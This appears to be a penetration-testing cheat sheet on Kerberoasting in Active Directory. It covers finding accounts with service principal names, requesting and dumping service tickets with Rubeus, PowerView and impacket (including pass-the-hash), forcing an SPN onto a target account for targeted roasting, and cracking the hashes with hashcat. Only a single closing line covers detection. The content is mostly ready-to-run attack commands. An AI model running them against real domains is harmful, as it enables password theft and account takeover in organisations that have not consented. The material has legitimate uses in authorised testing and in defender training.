Kerberoasting

👾 Overview

Kerberoasting is an attack that exploits the ServicePrincipalName AD Attribute to request TGS tickets for user accounts. These tickets are encrypted with keys from user passwords, and can be cracked offline.

🔍 Discovery

Requirements:

• Any valid domain account
• A user with a ServicePrincipalName that is not null

Windows enumeration:

# Using PowerView to find vulnerable accounts
Get-NetUser | Where-Object {$_.servicePrincipalName} | fl
 
# Using PowerShell to find vulnerable accounts
get-adobject | Where-Object {$_.serviceprincipalname -ne $null -and $_.distinguishedname -like "*CN=Users*" -and $_.cn -ne "krbtgt"}
 
# Using Rubeus to find vulnerable accounts
.\Rubeus.exe kerberoast /stats
 
# Builtin binary
setspn.exe -Q */*

Linux enumeration:

# Using ldapsearch to find kerberoastable users
ldapsearch -LLL -x -H ldap://[IP] -D "[USERNAME]" -W -b "dc=[DOMAIN],dc=[TLD]“ "(&(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512))(!(Us erAccountControl:1.2.840.113556.1.4.803:=2)))"

📌 Exploitation

Windows:

# Using Rubeus
.\Rubeus.exe kerberoast /outfile:kerberoast.hash
 
# Rubeus with a user
.\Rubeus.exe kerberoast /outfile:kerberoast.hash /creduser:[DOMAIN]\[USERNAME] /credpassword:[PASSWORD]
 
# Using PowerView
Request-SPNTicket -SPN "[SPN]" -Format Hashcat

Linux:

# Password will be prompted
impacket-GetUserSPNs -request -dc-ip [IP] [DOMAIN]/[USER] -outputfile kerberoast.hash
# Pass the hash
impacket-GetUserSPNs -request -dc-ip [IP] -hashes [LMHASH]:[NTHASH] [Domain]/[USER]  -outputfile kerberoast.hash

If you encounter a Kerberos clock skew error, try this fix.

🎯 Targeted Kerberoast

Targeted Kerberoasting can be carried out to obtain the password of a specific user. If an object has elevated permissions over the target, an attacker can add an SPN to that account making it Kerberoastable.

🔍 Discovery

Requirements:

• Any valid domain account
• One of the following permissions over the target
  • GenericAll
  • GenericWrite
  • WriteProperty
  • Validated-SPN

Use Bloodhound to easily find users that are susceptible to this attack.

📌 Exploitation

1. Authenticate as the user with one of the required permissions.

# Use a credential object if your session is not for the desired user
$SecPassword = ConvertTo-SecureString '[PASSWORD]' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('[DOMAIN]\[USERNAME]', $SecPassword)
 
# Set the SPN for the target account - Uses PowerView
# Omit credential if not needed
Set-DomainObject -Credential $Cred -Identity [TARGET USERNAME] -SET @{serviceprincipalname='random/garbage'}

2. Kerberoast
3. Cleanup - remove the SPN

# Omit credential if not needed
Set-DomainObject -Credential $Cred -Identity [TARGET USERNAME] -Clear serviceprincipalname

✨ Post-Exploitation

Once a TGS is obtained, it can be cracked using hashcat to obtain the user’s password.

# Simple dictionary attack
hashcat -a 0 -m 13100 ./kerberoast.hash [wordlist]

🚔 Detection & Evasion

Kerrberoasting generates the Windows event 4769 - A Kerberos service ticket was requested.